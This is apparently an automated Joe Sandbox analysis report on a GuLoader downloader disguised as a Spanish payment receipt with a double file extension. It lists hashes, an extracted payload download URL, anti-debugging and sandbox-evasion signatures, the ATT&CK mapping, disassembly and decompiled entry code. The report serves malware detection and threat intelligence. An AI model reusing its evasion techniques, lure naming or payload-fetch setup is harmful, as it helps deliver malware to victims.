Play interactive tour

Edit tour

Windows Analysis Report Justificante de Pago 25112021.pdf _.exe

Overview

General Information

Sample Name:	Justificante de Pago 25112021.pdf _.exe
Analysis ID:	528616
MD5:	494cd8be1913f9def79b10031587aa8a
SHA1:	ff74b67fa7c03d4fb388f49289ff14639656b3d3
SHA256:	75934da02313e0d772b4703bfaa3331311fc5a2b981f8ff0e455795bc3448ddb
Tags:	exeguloader
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Potential malicious icon found

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Initial sample is a PE file and has a suspicious name

C2 URLs / IPs found in malware configuration

Found potential dummy code loops (likely to delay analysis)

Uses 32bit PE files

Sample file is different than original file name gathered from version info

PE file contains strange resources

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

PE / OLE file has an invalid certificate

Contains functionality to call native functions

Program does not show much activity (idle)

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

Justificante de Pago 25112021.pdf _.exe (PID: 6016 cmdline: "C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe" MD5: 494CD8BE1913F9DEF79B10031587AA8A)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://onedrive.live.com/download?c"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1185369693.0000000002980000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.1185369693.0000000002980000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?c"}

Multi AV Scanner detection for submitted file

Show sources

Source: Justificante de Pago 25112021.pdf _.exe

ReversingLabs: Detection: 17%

Source: Justificante de Pago 25112021.pdf _.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\SKIBSBES.pdb source: Justificante de Pago 25112021.pdf _.exe

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://onedrive.live.com/download?c

Source: Justificante de Pago 25112021.pdf _.exe	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Justificante de Pago 25112021.pdf _.exe	String found in binary or memory: http://s.symcd.com06
Source: Justificante de Pago 25112021.pdf _.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Justificante de Pago 25112021.pdf _.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Justificante de Pago 25112021.pdf _.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Justificante de Pago 25112021.pdf _.exe	String found in binary or memory: https://d.symcb.com/cps0%
Source: Justificante de Pago 25112021.pdf _.exe	String found in binary or memory: https://d.symcb.com/rpa0
Source: Justificante de Pago 25112021.pdf _.exe	String found in binary or memory: https://d.symcb.com/rpa0.

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Justificante de Pago 25112021.pdf _.exe

Source: Justificante de Pago 25112021.pdf _.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: Justificante de Pago 25112021.pdf _.exe, 00000000.00000000.655922327.0000000000421000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSKIBSBES.exe vs Justificante de Pago 25112021.pdf _.exe
Source: Justificante de Pago 25112021.pdf _.exe, 00000000.00000002.1185543904.0000000002A60000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSKIBSBES.exeFE2X vs Justificante de Pago 25112021.pdf _.exe
Source: Justificante de Pago 25112021.pdf _.exe	Binary or memory string: OriginalFilenameSKIBSBES.exe vs Justificante de Pago 25112021.pdf _.exe

Source: Justificante de Pago 25112021.pdf _.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_00401578	0_2_00401578
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_0298C889	0_2_0298C889
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_02993C74	0_2_02993C74
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_02992493	0_2_02992493
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_02988C96	0_2_02988C96
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_0298C486	0_2_0298C486
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_029892AF	0_2_029892AF
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_029828D2	0_2_029828D2
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_029824EB	0_2_029824EB
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_0298061C	0_2_0298061C
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_0298D010	0_2_0298D010
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_02984608	0_2_02984608
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_0299120B	0_2_0299120B
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_02986E3F	0_2_02986E3F
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_0298B45C	0_2_0298B45C
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_0299367B	0_2_0299367B
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_0298258D	0_2_0298258D
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_02980386	0_2_02980386
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_029801EC	0_2_029801EC
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_0298BD14	0_2_0298BD14
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_02990937	0_2_02990937
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_02987555	0_2_02987555
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_02986557	0_2_02986557
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_0298AF4E	0_2_0298AF4E
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_0298DF79	0_2_0298DF79
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_0298657D	0_2_0298657D

Source: Justificante de Pago 25112021.pdf _.exe

Static PE information: invalid certificate

Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe

Code function: 0_2_0298C889 NtAllocateVirtualMemory,

0_2_0298C889

Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe

Process Stats: CPU usage > 98%

Source: Justificante de Pago 25112021.pdf _.exe

ReversingLabs: Detection: 17%

Source: Justificante de Pago 25112021.pdf _.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: classification engine

Classification label: mal84.rans.troj.evad.winEXE@1/0@0/0

Source: Justificante de Pago 25112021.pdf _.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\SKIBSBES.pdb source: Justificante de Pago 25112021.pdf _.exe

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000000.00000002.1185369693.0000000002980000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_00405661 push ebp; ret	0_2_00405664
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_004066B9 push ds; ret	0_2_004066D6
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_00403193 push ds; retf	0_2_0040324B
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_0298548B push ebx; ret	0_2_0298556C
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_029854B2 push ebx; ret	0_2_0298556C
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_02987ECB pushfd ; ret	0_2_02987F37
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_02985AFC push ds; ret	0_2_02985B23
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_029824E3 push E2DBE6FFh; retf	0_2_029824E9
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_0298422C push cs; retf	0_2_0298429C
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_02984267 push cs; retf	0_2_0298429C
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_02985FC4 pushad ; iretd	0_2_02985FC5
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_029841E0 push cs; retf	0_2_0298429C
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_02985502 push ebx; ret	0_2_0298556C
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_02982B39 push ds; retf	0_2_02982B50
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_02980F43 push ebp; retf	0_2_02980F44

Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe

Code function: 0_2_0298BBE8 rdtsc

0_2_0298BBE8

Anti Debugging:

Found potential dummy code loops (likely to delay analysis)

Show sources

Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe

Process Stats: CPU usage > 90% for more than 60s

Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_02990098 mov eax, dword ptr fs:[00000030h]	0_2_02990098
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_02992493 mov eax, dword ptr fs:[00000030h]	0_2_02992493
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_02990EBD mov eax, dword ptr fs:[00000030h]	0_2_02990EBD
Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe	Code function: 0_2_0298B8DD mov eax, dword ptr fs:[00000030h]	0_2_0298B8DD

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe

Code function: 0_2_0298BBE8 rdtsc

0_2_0298BBE8

Source: C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe

Code function: 0_2_02993C74 RtlAddVectoredExceptionHandler,

0_2_02993C74

Source: Justificante de Pago 25112021.pdf _.exe, 00000000.00000002.1184735200.0000000000C60000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: Justificante de Pago 25112021.pdf _.exe, 00000000.00000002.1184735200.0000000000C60000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: Justificante de Pago 25112021.pdf _.exe, 00000000.00000002.1184735200.0000000000C60000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: Justificante de Pago 25112021.pdf _.exe, 00000000.00000002.1184735200.0000000000C60000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Virtualization/Sandbox Evasion11	OS Credential Dumping	Security Software Discovery11	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Virtualization/Sandbox Evasion11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Information Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Justificante de Pago 25112021.pdf _.exe	18%	ReversingLabs	Win32.Trojan.Lazy

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://onedrive.live.com/download?c	false		high

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528616
Start date:	25.11.2021
Start time:	15:07:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Justificante de Pago 25112021.pdf _.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.rans.troj.evad.winEXE@1/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 26.5% (good quality ratio 11.6%) Quality average: 23.1% Quality standard deviation: 30.7%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com VT rate limit hit for: /opt/package/joesandbox/database/analysis/528616/sample/Justificante de Pago 25112021.pdf _.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.141971298184264
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Justificante de Pago 25112021.pdf _.exe
File size:	148800
MD5:	494cd8be1913f9def79b10031587aa8a
SHA1:	ff74b67fa7c03d4fb388f49289ff14639656b3d3
SHA256:	75934da02313e0d772b4703bfaa3331311fc5a2b981f8ff0e455795bc3448ddb
SHA512:	620ac0b14cfac47728cc1761d6cb9a50d45e1c050c96e8cf069cfb2729fdac8e257fcdb07db97c71c536b63646a548d956e9ec4614f703bd7f8b8a6803dea4e4
SSDEEP:	1536:q9aYr5MjHE4q7c4BMoDh9t4ooodRRK7bgNmGT4JVom8D/Qy5gy9LE+YJi3hbh:JYCjH7mc4BMtZ742JV4/Qa4J6h
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,..SM..SM..SM...Q..RM...o..UM..ek..RM..RichSM..................PE..L..._.XW.....................0......x.............@........

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x401578
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x57589F5F [Wed Jun 8 22:42:39 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e6bbebdc7c1418bc1bcdb0dc8a54e696

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Beske7@Udtoemtli6.opm, CN=Svrvgtere, OU=faringsa, O=Hepa6, L=MODGAAS, S=Dann4, C=NE
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	11/24/2021 3:02:10 AM 11/24/2022 3:02:10 AM
Subject Chain	E=Beske7@Udtoemtli6.opm, CN=Svrvgtere, OU=faringsa, O=Hepa6, L=MODGAAS, S=Dann4, C=NE
Version:	3
Thumbprint MD5:	38CEFA178A560F005C02C0AB1CCD5B2C
Thumbprint SHA-1:	6831094E8AE768575C155840ECA02AE1798897CF
Thumbprint SHA-256:	0577BE6AC49E2682236F51DB9FD872B71506301CDBE61148CA0A74BBD6E8C4A4
Serial:	00

Entrypoint Preview

Instruction
push 0041AC48h
call 00007F4B90796BE5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx+6C541393h], ah
adc byte ptr [edi+40h], ch
mov byte ptr [eax], cl
add eax, EA98183Fh
lock add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
inc ebp
outsb
or eax, 4F52200Ah
dec esp
dec ecx
inc edi
inc ebp
push edx
inc ebp
add byte ptr [edx+2Eh], al
push esp
js 00007F4B90796C67h
inc edx
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
sbb ebp, edi
push edx
push esp
xchg eax, ebp
retf
push ebp
cmc
inc esi
cmp dword ptr [ebx+ebx*4+4DA7D9D6h], FFFFFFABh
pop esp
jmp 00007F4B90796C29h
scasd
pop es
pop ds
mov eax, dword ptr [5832A24Ah]
sbb al, 69h
jnl 00007F4B90796BFDh
adc byte ptr [edx], bh
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
mov bh, 94h
add dword ptr [eax], eax
inc ebp
add byte ptr [eax], al
add byte ptr [eax], al
or dword ptr [eax], eax
dec ebx
inc esp
inc esp
inc ebp
push edx
push ebx
dec esp
dec edi
push esp
add byte ptr [54000701h], cl
jc 00007F4B90796C53h
outsb
jnc 00007F4B90796C5Fh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1f8f4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x21000	0x11ce	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x23058	0x14e8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1160	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x230	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x154	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1ee24	0x1f000	False	0.46585969002	data	6.32767470182	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x20000	0xc24	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x21000	0x11ce	0x2000	False	0.18798828125	data	2.35454948934	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
CUSTOM	0x21910	0x8be	MS Windows icon resource - 1 icon, 32x32	English	United States
RT_ICON	0x217e0	0x130	data
RT_ICON	0x214f8	0x2e8	data
RT_ICON	0x213d0	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x213a0	0x30	data
RT_VERSION	0x211a0	0x200	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaCyStr, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaObjVar, __vbaI2I4, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaFpCmpCy, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaVarErrI4, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaLateMemCall, __vbaVarDup, _CIatan, __vbaStrMove, __vbaAryCopy, __vbaCastObj, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0404 0x04b0
InternalName	SKIBSBES
FileVersion	1.00
CompanyName
ProductName	THELS
ProductVersion	1.00
OriginalFilename	SKIBSBES.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Chinese	Taiwan

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: Justificante de Pago 25112021.pdf _.exe PID: 6016 Parent PID: 5364

General

Start time:	15:08:08
Start date:	25/11/2021
Path:	C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Justificante de Pago 25112021.pdf _.exe"
Imagebase:	0x400000
File size:	148800 bytes
MD5 hash:	494CD8BE1913F9DEF79B10031587AA8A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1185369693.0000000002980000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Justificante de Pago 25112021.pdf _.exe PID: 6016 Parent PID: 5364 Justificante de Pago 25112021.pdf _.exeCOMMON

Executed Functions

Function 0298C889, Relevance: 9.8, APIs: 1, Strings: 4, Instructions: 1071memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(0157B1B1), ref: 0298CBD3

Strings

x$n, xrefs: 0298A881
h-NV, xrefs: 029895F4
hCw, xrefs: 0298A0E2
Ib, xrefs: 02989319

Memory Dump Source

Source File: 00000000.00000002.1185369693.0000000002980000.00000040.00000001.sdmp, Offset: 02980000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: Ib$h-NV$hCw$x$n
API String ID: 2167126740-2039911244
Opcode ID: 7e53b83bad73c67d866b013b2b2041212b5de045a1bd67221f642ed25a7d4c78
Instruction ID: fac3a0e6e7bb32f34838eca80141f5fa0a2817f49726cbc3906c116810b6733b
Opcode Fuzzy Hash: 7e53b83bad73c67d866b013b2b2041212b5de045a1bd67221f642ed25a7d4c78
Instruction Fuzzy Hash: B992657160834ADFDB34AE38C9953EA7BB2FF56350F89452EDD8A9B210D3354981CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00401578, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 943
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			_entry_(signed int __eax, void* __ebx, char __ecx, void* __edi, signed int __esi) {
				intOrPtr* _t148;
				char* _t150;
				signed int _t151;
				signed int _t152;
				intOrPtr* _t202;
				void* _t210;
				void* _t216;
				intOrPtr* _t227;
				void* _t248;
				signed int _t251;
				signed int _t440;
				void* _t442;
				void* _t443;
				void* _t451;
				intOrPtr _t458;

				_t242 = __esi;
				_push("VB5!6%*"); // executed
				L00401572(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t148 = __eax + 1;
				 *_t148 =  *_t148 + _t148;
				 *_t148 =  *_t148 + _t148;
				 *_t148 =  *_t148 + _t148;
